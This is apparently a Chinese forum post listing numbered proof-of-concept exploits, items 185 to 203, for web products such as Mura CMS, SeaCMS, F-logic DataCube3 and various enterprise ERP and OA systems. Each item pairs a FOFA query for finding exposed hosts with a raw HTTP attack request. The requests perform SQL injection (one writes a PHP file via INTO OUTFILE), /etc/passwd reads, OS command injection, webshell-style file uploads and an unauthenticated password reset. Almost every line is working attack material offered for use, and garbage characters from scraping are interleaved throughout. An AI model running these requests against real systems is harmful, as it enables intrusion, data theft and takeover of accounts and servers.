* H% U! D7 A2 V- |) g a9 A185. 瑞友天翼应用虚拟化系统SQL注入; V1 M4 l P; y9 u
version < 7.0.5.15 c$ N) t- P" U. [0 E/ d$ p
FOFA:app="REALOR-天翼应用虚拟化系统") M. Q/ G) U/ O% D
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1, F2 ?5 Z* z3 K0 E* X3 ?
Host: host& L0 g% `* n4 y
t5 w( _: p9 b; q, V1 }/ Z+ f% ` {& n
186. F-logic DataCube3 SQL注入' H+ G+ [$ l4 f# U! r! Z& Y. d
CVE-2024-31750. u$ Y- { O/ U( L
F-logic DataCube3是一款用于光伏发电系统的紧凑型终端测量系统
+ z- r% L* v* n$ TFOFA:title=="DataCube3" ?4 k5 g3 M8 h# n8 M
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
+ b1 k9 s5 B; Q: m8 @8 v- DHost: your-ip
, q! D7 z. D) K, s+ w: q& C _User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0! N0 m$ o, }/ N
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
2 g8 G+ n1 _+ vAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2( c4 s) E. |0 A# s9 s
Accept-Encoding: gzip, deflate
* |. Z5 k1 q+ d$ Y( J/ z% p& KConnection: close! R) u. f- |. S1 W4 M0 C8 r7 K
Content-Type: application/x-www-form-urlencoded
8 S u7 S9 L' y9 Z; }/ m1 E
$ O: u8 ~8 W% T7 A4 I: Oreq_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450' R; Y, k! t6 k! d
1 y/ z( A( z% ]: T1 |! Q
7 |9 f; [8 `8 N187. Mura CMS processAsyncObject SQL注入) n* n4 Z5 ^/ B6 y" g6 N; _. y! i5 P7 L
CVE-2024-326401 S* V, J$ o; }! {3 a6 w
FOFA:"Mura CMS"
( x- f8 v% y3 y& SPOST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
% R1 c2 q6 C7 I3 M [# h2 sHost: your-ip
8 ^8 P8 S# ^ y6 T7 I3 x$ N J% @Content-Type: application/x-www-form-urlencoded
' d: D' g& n. s# I* ~4 h0 g. Q, p' ~: _/ I
: v) M$ @$ x& c% g$ w
object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1! Y' ]7 d6 B* h( F* L: D6 X
" X- V3 u8 `! R& z+ i2 U* y+ f( K r; u
188. 叁体-佳会视频会议 attachment 任意文件读取6 O0 a. r; ?5 O3 Y8 `! t+ G
version <= 3.9.7" u4 @7 X$ v T7 ` N+ q5 c
FOFA:body="/system/get_rtc_user_defined_info?site_id"
7 c- n% ]# b3 BGET /attachment?file=/etc/passwd HTTP/1.1# I9 Z8 k) \, i$ C
Host: your-ip
1 B1 Z) Z0 ~) }5 JUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 V R) p1 n o
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
- c) l* ?5 ?6 `Accept-Encoding: gzip, deflate6 x; B% r0 r8 P) h8 u
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
% u# h: o' |4 ]. ]# d7 Q$ RConnection: close
: V# f! c3 z0 S# f: V9 s8 x; y3 @, N
" V' d4 q' d( Y# Y9 a189. 蓝网科技临床浏览系统 deleteStudy SQL注入9 J k |. S: f" a5 ~* r9 V( F
FOFA:app="LANWON-临床浏览系统"5 ^6 f; s- p+ x' I# Y* z
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.12 Y$ h1 b& f! ~
Host: your-ip
, v6 V8 y0 T4 h1 U6 sUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36' u7 t' W8 V4 l( G
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7) [0 e4 w8 J8 U+ m5 V$ S
Accept-Encoding: gzip, deflate
0 B2 g2 @/ B$ k5 M- t8 `2 yAccept-Language: zh-CN,zh;q=0.96 V% I0 q6 i& F7 [2 d
Connection: close
+ u& y1 d. |0 e/ `2 }7 _
' \. z, I/ x' G3 N: }$ K
# U6 r9 X; |* B" E6 A190. 短视频矩阵营销系统 poihuoqu 任意文件读取
; [5 i: L# G$ S, x+ D) q& j( b- V- }FOFA:title=="短视频矩阵营销系统"+ i3 q* @: N7 B5 R5 h: X
POST /index.php/admin/Userinfo/poihuoqu HTTP/2. e% `8 j& | v4 w: N$ w8 a
Host: your-ip
# s7 y- S% }0 e: u3 ?, UUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.365 Y; O! k( ^' z s$ F% P% [
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9: `' [6 a* N; O2 Z
Content-Type: application/x-www-form-urlencoded
' B# _- w+ k- t- }" ?% y6 rAccept-Encoding: gzip, deflate: ^3 ?; T4 a+ K/ O5 F7 A3 t
Accept-Language: zh-CN,zh;q=0.9) _0 E' B9 b; C4 L, s" E+ M( I2 o
9 A; A8 ^* z/ O9 ]poi=file:///etc/passwd- j) s0 B# A5 I! P! u: i
. o! @9 b2 n* _! l5 k" t
: b& ~2 J U, ]3 E7 u; W0 {191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入
0 Q/ z4 H4 j: S, r6 r) ]! vFOFA:body="/CDGServer3/index.jsp"
5 E8 I- ?# J3 E4 ?4 Y5 zPOST /CDGServer3/js/../NavigationAjax HTTP/1.1
' \3 Z/ I7 k+ l. w* ?$ lHost: your-ip
8 y' z0 H+ K5 t9 m2 C6 a' I qUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.364 G6 r8 d7 h! o: P+ a) \
Content-Type: application/x-www-form-urlencoded
0 S8 E0 G1 B" `! |0 P
2 x5 h" P" C; ocommand=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=+ l' L& _( Y! y) a2 l
6 _; \% C( w6 X! J) z+ D
" v0 ~% x5 E+ n$ w+ |6 q2 l _; m4 o192. 富通天下外贸ERP UploadEmailAttr 任意文件上传
$ H( B6 b* I& W* @* W" `: bFOFA:title="用户登录_富通天下外贸ERP"
- o7 ^. d/ m! B7 P5 hPOST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
9 ]8 D8 h! p! fHost: your-ip
! d( H4 `9 h2 S6 s7 J% a" x' TUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
( @* Q) Y+ |+ J1 L% P8 _Content-Type: application/x-www-form-urlencoded% I! R8 N; W: t4 ?' M0 {1 P8 @; X$ G; N5 b
9 _6 X5 {1 K) x7 x
4 z- A. U; e; a<% @ webhandler language="C#" class="AverageHandler" %>
# b- k8 {+ ]+ p- C; w+ T6 r$ qusing System;4 T! ` @4 d: J6 G9 f& }( q2 Y. a# ?
using System.Web;
' \; {6 m- i7 S* d$ |& t8 Lpublic class AverageHandler : IHttpHandler
! i- ` ~6 x" v' g: K, {{* R6 ^% l/ x2 L2 l( s
public bool IsReusable
) ?! j, v; h2 S9 W6 [( I: U+ P{ get { return true; } }- m+ e+ V* O+ Z7 C c( N0 |
public void ProcessRequest(HttpContext ctx)
' o$ |. e4 d& ]% R{4 T; l; P. a U
ctx.Response.Write("test");
7 Y! T, i' d8 T6 Z2 h/ F}( ~! [9 ]+ o9 i5 Z/ v% e1 @6 i
}
; k, \2 z. c& a
* g3 ?* I( K# M; f- B/ P* R: _# [8 F# E: w* v
193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行* t& J" n. C+ K& c* P; N- c
FOFA:body="山石云鉴主机安全管理系统"
9 S* E* ?( p' g" f0 YGET /master/ajaxActions/getTokenAction.php HTTP/1.1 s, A* y3 Y0 i+ r3 W
Host:
3 B% n3 q# F) o8 }- R" hCookie: PHPSESSID=2333333333333;: L3 n. [; I- g2 s/ l
Content-Type: application/x-www-form-urlencoded0 L+ D9 B& z# O5 O
User-Agent: Mozilla/5.00 ^7 q& \/ k; R
9 }7 `) v6 ~7 P* J7 {* C1 I X( g, |' p4 L" @& x
POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1+ L+ E5 ]- w# z
Host:
, c2 w, F: J2 p# L0 YUser-Agent: Mozilla/5.02 q+ Q0 @& q( b; L7 ~* s, ^4 a
Accept-Encoding: gzip, deflate
( w- {4 i1 @5 b+ RAccept: */*
/ p2 X [ V0 R B2 ~9 @3 P% i( A7 Q- \Connection: close* q- Z$ {0 h4 W& p1 x
Cookie: PHPSESSID=2333333333333;
% U! F6 k. g. KContent-Type: application/x-www-form-urlencoded6 b$ |+ F4 V3 j) E
Content-Length: 84
; N c+ l1 D* J8 R2 r; u; s7 u0 ~4 j2 y9 `7 O* f
param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')5 I! z/ M$ d4 z9 n- ^
$ ?! g$ ~/ T; Z/ |
; u f& y0 C- [( E& AGET /master/img/config HTTP/1.10 ^9 G, J& U6 | g* @. l' c) D" w4 H0 ^
Host:
- Z- d1 w+ I) vUser-Agent: Mozilla/5.0
% O) a Z; ?8 F& V+ M; ~7 |
" p/ S: i/ f$ K/ V- B. h! ]2 M& Z6 I1 W* P8 r* f
194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传
2 U$ Q$ D, m+ J( x% LFOFA:app="FE-协作平台"访问 /servlet/uploadAttachmentServlet 有返回则漏洞存在
8 m7 i" [2 _; K$ g$ Z
& a* p$ }' m4 x- OPOST /servlet/uploadAttachmentServlet HTTP/1.1$ `6 n4 T8 {: I$ I! M; Q0 r
Host: host
, q* O9 ]+ y2 f5 Z- P) JUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.361 K7 L7 A! |: k7 Q1 S
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
2 F. N! a. V* }/ ?) ^0 B2 C( TAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+ g2 s6 @1 S5 V' pAccept-Encoding: gzip, deflate
3 T$ H2 _( h) P* X' c8 b4 U2 AConnection: close
' z/ O; Y! V3 fContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk
3 E' y$ r- _6 k" ]& k: u: p9 H/ n------WebKitFormBoundaryKNt0t4vBe8cX9rZk. M. e( U9 F, ? I5 u8 e4 X
! W) ?' {2 H6 L) r3 B3 `
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"' g6 M: j6 k6 W, U5 z
Content-Type: text/plain
9 `" ^$ t7 [% u<% out.println("hello");%>* e$ A# R- k, q0 \: N7 z
------WebKitFormBoundaryKNt0t4vBe8cX9rZk' p& k; S0 S2 S& M U' Y1 @
Content-Disposition: form-data; name="json"
( j8 o& f1 p& T! E: [2 |+ k {"iq":{"query":{"UpdateType":"mail"}}}
" ~3 I' a) x# [# x' S) ~$ [( p+ P+ H------WebKitFormBoundaryKNt0t4vBe8cX9rZk--
6 K: v4 Q9 C- @7 r& Y- S- E
* P3 `0 }- u& {/ c0 a8 s' c! I C ~" N
195. 飞鱼星上网行为管理系统 send_order.cgi命令执行1 Q+ [( y8 B u, T% ?
FOFA:title=="飞鱼星企业级智能上网行为管理系统
' ^, c6 C( ?# n! \POST /send_order.cgi?parameter=operation HTTP/1.1
- E, e! D& s8 gHost: 127.0.0.1
9 P/ k+ W4 h- ?Pragma: no-cache2 q. j, G6 O' v1 e9 i5 v
Cache-Control: no-cache* c, A5 ~* B. q; F# z/ }
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
/ {/ Y* h6 d6 TAccept: */*
) u4 _ \ z3 ]* U j9 [Accept-Encoding: gzip, deflate
) P$ D6 ]! q l. XAccept-Language: zh-CN,zh;q=0.9
7 r. \8 b) v M1 D+ lConnection: close
( E$ V' a+ [& y. @4 M) tContent-Type: application/x-www-form-urlencoded
5 \& e) {6 a+ ?9 Y+ ^Content-Length: 68
. _6 M1 T* S4 s$ l5 Z! c3 `; W# d
Y3 C' t4 m6 u' H; v{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}
3 N- y/ A# O* A1 C( Q
9 z7 M" l# K; U/ D( r0 \9 v: z/ {0 P6 o$ F1 L6 e W
196. 河南省风速科技统一认证平台密码重置( X) D4 H, u2 |' S5 y/ S* H% F
FOFA:body="/cas/themes/zbvc/js/jquery.min.js". J k% B/ f6 e0 @
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
. ? |! |2 ?9 G+ |$ H# xUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
0 |$ [) z* z1 _Content-Type: application/json;charset=UTF-8 T2 G2 R# v* K6 {; v
X-Requested-With: XMLHttpRequest
( Q3 S$ [2 q) A" C D; f5 ZHost:% v: O: u3 q1 H+ q/ g+ ?
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
: O4 d) h( u& ^Content-Length: 45" d: f1 k: ?* _7 i4 j; p6 u
Connection: close
0 r& l8 S8 V* q1 ^
2 i: W' Z- j. A6 @5 z& f1 A{"xgh":"test","newPass":"test666","email":""}! g8 S3 F, M5 W; @, t) T
- G4 f6 Y. i$ S& G& c
, k7 D" q3 I6 o
5 x& l5 W, d- r% D' X3 v4 y# T: q
197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入* v) p2 x+ i' _2 w
FOFA:app="浙大恩特客户资源管理系统"
6 W3 O* V6 j$ N# X) _5 C( ]( u# qGET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1; [% {3 O* w9 u) O7 f6 N, W( z M9 y) f
Host:
+ s# u) y3 I) R5 T9 rUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
$ n9 o' |- D/ g; J Q/ gAccept-Encoding: gzip, deflate
4 @4 \. d1 S/ H$ ]' }Connection: close
* O) D' i3 r1 S/ `- ^0 F: L& ?5 _/ `2 c. Z' E# _' p: h
0 N: s0 }5 F4 `, o" T* E/ Z+ g) x0 s; }
198. 阿里云盘 WebDAV 命令注入3 Q1 I; f( o |4 E+ j; F
CVE-2024-296404 o# g4 b5 g. T, d3 A' P- n7 @0 g2 [
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
* A5 t# d% |! r6 R r2 rCookie: sysauth=41273cb2cffef0bb5d0653592624cf64& x3 \- s' Y5 B+ `
Accept: */*' u' ^5 ?( R8 [6 i a9 }4 }7 L
Accept-Encoding: gzip, deflate
' P- |; F4 J- H! H* V" wAccept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
% ^) R1 Q8 e$ M1 ~: i2 |$ A4 BConnection: close' a$ l; {/ Q7 q9 P
1 D5 U- k! j* x& T/ ]9 j
D! ^* c, H- ~5 ]4 ~199. cockpit系统assetsmanager_upload接口 文件上传, [5 F- f N0 }5 r) D K
% X. p0 k6 \2 X* D& N4 a) O1.执行poc进行csrf信息获取,并获取cookie,再上传访问得到结果:+ B. P( d: b4 E! M1 H \5 U* I
GET /auth/login?to=/ HTTP/1.1
! @( j3 a H1 p8 S
* M# Z) c6 t' K9 q响应:200,返回值:csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"
! a( T8 N) z# w2 O% {. ?! z2 ]$ l, a @# `
2.使用刚才上一步获取到的jwt获取cookie:
0 i. V) I& C* G& T+ d) f8 ^( c/ p0 q6 i1 i
POST /auth/check HTTP/1.1
9 V4 q2 Z; I5 K" E* H. KContent-Type: application/json2 E4 m! F! h; f4 Q
" K. a" u) a( C{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}
/ G( R* [1 T6 b: z& P$ k7 `
% Q8 @; a7 j; n. v3 Y$ R, w. A响应:200,返回值:
: w: Y" D5 \0 [6 g5 s8 T5 ~! ESet-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/2 e' Q! B- e+ Z0 S' n
Fofa:title="Authenticate Please!"; Z7 y7 b- F3 l
POST /assetsmanager/upload HTTP/1.1
( L. g$ L/ r6 s O8 y8 GContent-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3' H# V6 d; _3 G8 X" D
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92
& g# Z, | `! i* p7 _( x+ e5 i2 h( e# r; |! j' H
-----------------------------36D28FBc36bd6feE7Fb33 ]. E" K) X. V3 S
Content-Disposition: form-data; name="files[]"; filename="tttt.php") ~, L9 N! y% Y7 Q) @: V/ Z
Content-Type: text/php. k2 o* {& ?% I3 e
/ y- i5 o8 U1 m2 a2 }+ I6 y<?php echo "tttt";unlink(__FILE__);?>" o/ Y9 [, e' L5 ^
-----------------------------36D28FBc36bd6feE7Fb3
# u& x. X7 J: J3 cContent-Disposition: form-data; name="folder"9 V. ~- w) j# } z0 }# v2 E3 N6 e
4 V3 y* g( U5 x# ?- B% R$ w
-----------------------------36D28FBc36bd6feE7Fb3--
: @& l0 Z7 w5 G! m* l$ B. e0 N$ O; m+ \( H3 _
* l7 S; P1 C# l7 L& j4 D
/storage/uploads/tttt.php( v& e5 ]. F; c+ n
8 J2 c! G# k: A7 }$ f# I
200. SeaCMS海洋影视管理系统dmku SQL注入5 C$ f, e: U9 r& R; |" e5 S# H. ~
FOFA:app="海洋CMS"' G+ s# y. Z% N, l, ], ~+ s
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
; m$ l+ X$ F! n2 jCookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
. y( X5 v( o$ | y& D8 c' b6 uUpgrade-Insecure-Requests: 1- t+ X8 V% Q) b/ m+ Z9 k
Cache-Control: max-age=0. O- E y! M8 h" M
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
; Z; j; m$ o0 n" BAccept-Encoding: gzip, deflate/ |. Q8 `. N! x: _6 z: Q" I
Accept-Language: zh-CN,zh;q=0.9
, [' X& B; L4 d4 `" N6 A
8 |$ ~2 y* Q2 a' I4 }4 o
& N7 l, m8 ^8 A201. 方正全媒体新闻采编系统 binary SQL注入# L2 ^& j( d5 a. x1 O& C( Z
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
! m0 s2 ?+ j2 O2 e! p; Q7 bPOST /newsedit/newsplan/task/binary.do HTTP/1.1: T8 o, p5 V1 Y- u {4 D1 _
Content-Type: application/x-www-form-urlencoded
/ c% u/ ^$ P2 rAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7: ?, T' N0 {6 b" W3 g3 {6 e, K
Accept-Encoding: gzip, deflate
8 p# G7 q: F e9 p) {* D9 _ mAccept-Language: zh-CN,zh;q=0.9
. P( u+ n9 W- y7 `7 iConnection: close {) O4 Y3 }* B: w5 h
! |& Y9 W' P' F) H: a6 D
TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1( E# x. L+ G, r. G8 _6 P9 _ p1 Z9 ^$ E
( A- E) q+ C' |, O7 d5 @7 c) f
) ?7 b" m3 T5 f2 k5 m, O6 s202. 微擎系统 AccountEdit任意文件上传
" p& h8 b2 _3 @8 ]1 VFOFA:body="/Widgets/WidgetCollection/"
9 c, i$ }' P) n/ [5 J* d8 T0 [5 Y获取__VIEWSTATE和__EVENTVALIDATION值; s' P' `$ j. v5 ] O
GET /User/AccountEdit.aspx HTTP/1.1
6 y( F5 Z8 C1 t2 T/ A) _Host: 滑板人之家
# B3 x$ @# `4 F/ V+ T2 ]0 ?User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.313 D! g& E c4 c+ T, `( p) [4 i
Content-Length: 0' C% k9 y/ b X7 g- s; @ ^0 X! B
3 U' l! g0 Z3 a; @3 y1 D
. l+ }. n" c8 a- ~6 @( P
替换__VIEWSTATE和__EVENTVALIDATION值" ]( \/ N6 N5 H$ Y( f" L# u
POST /User/AccountEdit.aspx HTTP/1.1
. X8 b7 K% Q: H! S8 r8 u* u6 m2 c1 jAccept-Encoding: gzip, deflate, br
' [ [7 B) Q5 b) T0 L# C4 i2 ?3 bContent-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687- M+ P! C0 N# K8 V; ^. x
7 t p, Y5 t2 e
-----------------------------786435874t38587593865736587346567358735687
6 g( P9 _) g& ]( @' jContent-Disposition: form-data; name="__VIEWSTATE"
: ^& @5 q6 r$ z5 C
) i4 h F; F8 _3 l__VIEWSTATE2 \3 L/ s6 m! ~, a/ o. o8 \
-----------------------------786435874t385875938657365873465673587356870 _1 f! s' n2 ~0 q
Content-Disposition: form-data; name="__EVENTVALIDATION"
- U+ [4 L. I; f- c: v+ ~0 R( d5 \& s5 l9 L
__EVENTVALIDATION1 w' T4 V; O# ]/ Z
-----------------------------786435874t385875938657365873465673587356870 @ }! T; l9 s% j: t8 l
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
2 j$ B) ~+ ?8 ?- oContent-Type: text/plain7 j5 w4 s. g* @8 v: X6 |+ s |1 ?
9 C }6 ]: `% v& K+ R- m6 P8 C' U
Hello World!( v1 a4 C2 n+ h" [" i& q
-----------------------------786435874t385875938657365873465673587356872 u$ h& a! M$ o1 W1 Y. h K: f$ B
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"( h* Z' X# O" H7 }" H1 B
; C- @. f0 _0 ~上传图片: A: Q: {' W! R( y- @- V3 L
-----------------------------786435874t38587593865736587346567358735687
6 }% V* L# m/ C _, U& AContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"
( D1 Q& h4 S" k: F: n( j6 @( s, X4 i. A, s8 r; Y
9 c! `' D8 b p, F-----------------------------786435874t38587593865736587346567358735687
: U* d3 t5 x, M9 k, v" t: D2 s oContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"+ N/ Q: `- Q9 K: P! B4 z
" }% M' [1 l9 \: j& z. R! u9 { b9 g! J+ A' m
-----------------------------786435874t38587593865736587346567358735687--
) [8 j! g" n6 K
0 W8 z" g1 J, v% r5 `4 V0 p& y# h8 U" h# X; ~
/_data/Uploads/1123.txt
& r- L) h! ? ]4 y; b8 N. z# O; o f* |; C
203. 红海云EHR PtFjk 文件上传
7 N% j! W* u9 G. j: H, J6 kFOFA:body="RedseaPlatform"* B" c; B# L \) {4 [ M6 E9 q
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1! m, K* h% G" i. n# }0 n
Host: x.x.x.x
, L( c# Q; y* O PAccept-Encoding: gzip1 B" _" t4 x# Q* A$ ^9 U
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15! S8 D' F) N) P7 t% Y+ F
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
- J$ J8 P8 h% j- hContent-Length: 210* ?% t# c6 u5 `9 n
' R3 b6 T4 ]: {------WebKitFormBoundaryt7WbDl1tXogoZys4
. M" \9 e$ } z$ M; q- r; ]- QContent-Disposition: form-data; name="fj_file"; filename="11.jsp"3 U) e% l2 V" x* J# ?2 K
Content-Type:image/jpeg
) w! I' a! q: Z0 {( h2 J3 a) }' i- Z& n) M4 }/ m+ u, F& w& N
<% out.print("hello,eHR");%>
% ~9 P3 U# z! L/ a2 B* g------WebKitFormBoundaryt7WbDl1tXogoZys4--3 T7 F$ ~( n3 f6 k& p- K- K3 A
( e7 p i& v. [" \* _ / ~; }, _" \% V& S; G
# M# R8 i- ?& J) o5 q( N$ ?, L
6 o+ c6 h* i6 ~% Z! ^6 _
7 s- P; E3 T, D/ P3 s8 [
: J `1 {: q+ h" O
|
发表于 2024-6-5 14:31:29
收藏
支持
反对